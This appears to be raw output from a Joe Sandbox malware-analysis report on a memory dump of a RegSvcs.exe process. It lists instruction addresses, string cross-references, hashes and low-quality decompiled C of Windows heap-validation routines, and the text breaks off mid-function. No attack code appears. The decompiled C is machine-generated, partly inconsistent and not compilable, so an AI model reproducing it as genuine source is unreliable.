0x01072f04
0x01072f04
0x01072f06
0x01072f0d
0x01072f0f
0x01072f13
0x01072f13
0x01072f1b
0x01072f21
0x01072f27
0x01072f95
0x01072f98
0x01072f9b
0x01072fa0
0x00000000
0x00000000
0x01072fa6
0x01072fa9
0x01072fac
0x00000000
0x00000000
0x01072fb2
0x01072fb9
0x00000000
0x00000000
0x01072fc3
0x01072fca
0x00000000
0x00000000
0x01072fd0
0x01072fd6
0x01072fd9
0x01072ff8
0x01072ffd
0x01072fdb
0x01072ff0
0x01072ff5
0x0107300e
0x0107300f
0x0107301a
0x00000000
0x01072f29
0x01072f29
0x01072f2c
0x01072f4b
0x01072f50
0x01072f2e
0x01072f43
0x01072f48
0x01072f56
0x01072f64
0x01072f6c
0x01072f6c
0x01072f72
0x01072f76
0x01072f7c
0x01072f83
0x01072f89
0x01072f8a
0x01072f8a
0x00000000
0x01072f76
0x01072f27
0x01072e6d
0x01072da6
0x01072dab
0x01072db3
0x01072db9
0x010730bc
0x010730c1
0x010730c1

APIs

RtlDebugPrintTimes.NTDLL ref: 01072DB3

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 01073015
HEAP: , xrefs: 01072F4B, 01072FF8, 0107304F
RtlAllocateHeap, xrefs: 01072DCA
HEAP[%wZ]: , xrefs: 01072F3E, 01072FEB, 01073042
Just allocated block at %p for %Ix bytes, xrefs: 01072F5F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0107305E

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: fc3c7151e598ded1134e9b59c20b856580c10ca57ea1b898cbdef4250e914015
Instruction ID: c1da79a2e56e82367373e2101e49b877cf9598eff698fc0566c621ab57cefb7f
Opcode Fuzzy Hash: fc3c7151e598ded1134e9b59c20b856580c10ca57ea1b898cbdef4250e914015
Instruction Fuzzy Hash: 02911531900640DFEB22DFA8C465AEDBBF2FF45710F088059F5859B292C7369941EB59

Uniqueness

Uniqueness Score: -1.00%

Function 01074AEF Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E01074AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00FBB150();
						} else {
							E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00FBB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0106FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00FBB150();
						} else {
							E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00FBB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00FBB150();
									} else {
										E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00FBB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0106FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00FBB150();
										} else {
											E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0100D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0107A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00FDE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0107A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00FDE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00FDA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00FDA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E00FDBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E010623E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00FB1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x01074af7
0x01074afb
0x01074afd
0x01074b01
0x01074b03
0x01074b08
0x01074b0a
0x01074b0f
0x01074eb5
0x01074eb5
0x01074ebb
0x010750d5
0x010750d8
0x01074ff6
0x00000000
0x01074ff6
0x010750de
0x010750e4
0x010750e8
0x01075107
0x0107510c
0x010750ea
0x010750ff
0x01075104
0x01075112
0x01075115
0x01075118
0x01075119
0x010750cb
0x010750cb
0x010750af
0x00000000
0x010750af
0x01074ecb
0x010750b6
0x010750bb
0x01074ed1
0x01074ee6
0x01074eeb
0x010750c1
0x010750c2
0x010750c5
0x010750c6
0x00000000
0x00000000
0x00000000
0x00000000
0x01074b15
0x01074b15
0x01074b1c
0x01074b1e
0x01074b23
0x01074b27
0x01074b33
0x01074b38
0x01074b3a
0x01074b3c
0x01074b41
0x01074b41
0x01074b3a
0x01074b52
0x01075045
0x0107504b
0x0107504f
0x0107506e
0x01075073
0x01075051
0x01075066
0x0107506b
0x01075083
0x01075088
0x01075088
0x0107508a
0x01075091
0x01075099
0x01075099
0x0107509d
0x010750a7
0x010750ad
0x010750ad
0x010750ad
0x00000000
0x0107509d
0x01074b58
0x01074b5b
0x01074b5e
0x01074b63
0x01074b66
0x01074b69
0x01074b6f
0x01074be4
0x01074bf0
0x01074bf2
0x01074bf5
0x01074dc3
0x01074dc6
0x01074dc9
0x01074dce
0x01074dce
0x01074dd0
0x01074dd0
0x01074dd5
0x01074def
0x01074dd7
0x01074de7
0x01074de7
0x01074df3
0x01075001
0x01075007
0x0107500b
0x0107502a
0x0107502f
0x0107500d
0x01075022
0x01075027
0x01075039
0x0107503a
0x0107503b
0x00000000
0x01074df9
0x01074dfd
0x01074e90
0x01074e94
0x01074e9e
0x01074ea4
0x01074ea4
0x01074ea4
0x01074ea6
0x01074ea6
0x00000000
0x01074ea6
0x01074e03
0x01074e08
0x01074f88
0x01074f92
0x01074f99
0x01074f9c
0x01074fe0
0x01074fe4
0x01074fee
0x01074ff4
0x01074ff4
0x01074ff4
0x00000000
0x01074fe4
0x01074f9e
0x01074fa4
0x01074fa8
0x01074fc7
0x01074fcc
0x01074faa
0x01074fbf
0x01074fc4
0x01074fd2
0x01074fd5
0x01074fd6
0x01074f34
0x01074f34
0x00000000
0x01074f39
0x01074e0e
0x01074e14
0x01074e1b
0x01074e25
0x01074e2b
0x01074e2b
0x01074e33
0x01074e38
0x01074e8a
0x01074e8a
0x00000000
0x01074e3a
0x01074e3e
0x01074e43
0x01074e47
0x01074e53
0x01074e58
0x01074e5a
0x01074e5c
0x01074e61
0x01074e61
0x01074e5a
0x01074e6e
0x01074f41
0x01074f47
0x01074f4b
0x01074f6a
0x01074f6f
0x01074f4d
0x01074f62
0x01074f67
0x01074f7f
0x01074f80
0x01074f81
0x00000000
0x01074e74
0x01074e78
0x01074e82
0x01074e88
0x01074e88
0x00000000
0x01074e78
0x01074e6e
0x01074e38
0x01074df3
0x01074bfe
0x01074c01
0x01074c04
0x01074c07
0x01074c09
0x01074c0c
0x01074c0e
0x01074c0e
0x01074c11
0x01074c11
0x01074c0c
0x01074c14
0x01074c17
0x01074dae
0x01074db2
0x01074db7
0x01074dba
0x01074dbd
0x01074ef1
0x01074ef7
0x01074efb
0x01074f1a
0x01074f1f
0x01074efd
0x01074f12
0x01074f17
0x01074f2b
0x01074f2b
0x01074f2d
0x01074f2e
0x01074f2f
0x00000000
0x01074f2f
0x00000000
0x01074c1d
0x01074c1d
0x01074c20
0x01074c23
0x01074c26
0x01074c29
0x01074c2c
0x01074c2e
0x01074d91
0x01074d91
0x01074d92
0x01074d97
0x01074d9e
0x00000000
0x01074d9e
0x01074c34
0x01074c37
0x01074c39
0x01074c3c
0x00000000
0x00000000
0x01074c45
0x01074c48
0x01074c4e
0x01074c50
0x01074c78
0x01074c78
0x01074c7b
0x01074c7d
0x01074c80
0x01074c84
0x01074cad
0x01074cad
0x01074cb0
0x01074cb8
0x01074cbb
0x01074cbe
0x01074cc1
0x01074cc7
0x01074cdc
0x01074cc9
0x01074cd2
0x01074cd4
0x01074cd4
0x01074cde
0x01074ce0
0x01074d13
0x01074d13
0x01074d16
0x01074d18
0x01074d29
0x01074d2a
0x01074d2c
0x01074d34
0x01074d1a
0x01074d1a
0x01074d1a
0x01074d1d
0x01074d1f
0x01074d22
0x01074d24
0x01074d24
0x01074d3c
0x01074d3f
0x01074d45
0x01074d47
0x01074d6c
0x01074d6c
0x01074d70
0x01074d7e
0x01074d84
0x01074d84
0x00000000
0x01074d49
0x01074d49
0x01074d56
0x01074d56
0x01074d59
0x00000000
0x00000000
0x01074d4e
0x01074d50
0x01074d52
0x01074d8e
0x01074d5d
0x01074d5f
0x01074d67
0x00000000
0x01074d67
0x01074d54
0x01074d54
0x01074d5b
0x00000000
0x01074d5b
0x01074ce2
0x01074ce2
0x01074ce5
0x01074ce5
0x01074ce7
0x01074cfb
0x01074ce9
0x01074ce9
0x01074cec
0x01074cef
0x01074cf1
0x01074cf3
0x01074cf3
0x01074cf3
0x01074cf6
0x01074cf6
0x01074d02
0x01074d05
0x00000000
0x00000000
0x01074d07
0x01074d0f
0x01074d11
0x00000000
0x00000000
0x00000000
0x01074d11
0x00000000
0x01074ce5
0x01074ce0
0x01074c8a
0x01074c8f
0x01074c91
0x00000000
0x00000000
0x01074c9d
0x00000000
0x01074c9d
0x01074c52
0x01074c5f
0x01074c5f
0x01074c62
0x00000000
0x00000000
0x01074c57
0x01074c59
0x01074c5b
0x01074caa
0x01074c66
0x01074c68
0x01074c70
0x01074c75
0x00000000
0x01074c75
0x01074c5d
0x01074c5d
0x01074c64
0x00000000
0x01074c64
0x01074c17
0x01074b75
0x01074bc4
0x01074bc8
0x00000000
0x00000000
0x01074bd9
0x00000000
0x00000000
0x00000000
0x01074b77
0x01074b7a
0x01074b8c
0x01074b7c
0x01074b7e
0x01074b83
0x01074b86
0x01074b86
0x01074b90
0x01074b93
0x00000000
0x00000000
0x01074b95
0x01074bab
0x01074bb0
0x00000000
0x00000000
0x01074bb2
0x01074bb9
0x00000000
0x00000000
0x01074bbb
0x01074bbe
0x01074bc1
0x01074bc1
0x00000000
0x01074bc1
0x01074b97
0x01074ba4
0x00000000
0x00000000
0x01074ba6
0x00000000
0x01074ba6
0x01074ea9
0x01074ea9
0x01074eb2
0x00000000

Strings

Heap block at %p has incorrect segment offset (%x), xrefs: 0107503B
Heap block at %p is not last block in segment (%p), xrefs: 01074FD6
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0107508C
HEAP: , xrefs: 01074F1A, 01074F6A, 01074FC7, 0107502A, 0107506E, 010750B6, 01075107
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 01075119
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 010750C6
HEAP[%wZ]: , xrefs: 01074EE1, 01074F0D, 01074F5D, 01074FBA, 0107501D, 01075061, 010750FA
Free Heap block %p modified at %p after it was freed, xrefs: 01074F2F
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 01074F81

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 839ea55279c84f950816c866e7cee7eafdd243094596399adc7df222688f332b
Instruction ID: 28d0e3bb17a30817cc9ab7a7fec210b1b2099bcb1436c256aae685fadccb6217
Opcode Fuzzy Hash: 839ea55279c84f950816c866e7cee7eafdd243094596399adc7df222688f332b
Instruction Fuzzy Hash: 9512D030A046459FDB25DF69C895BBABBF5FF08310F148499E4C6CB682D778E880CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01074496 Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E01074496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E010749A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x10a6378 = _t267;
						asm("int3");
						 *0x10a6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E00FE174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00FBB150();
							} else {
								E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00FBB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
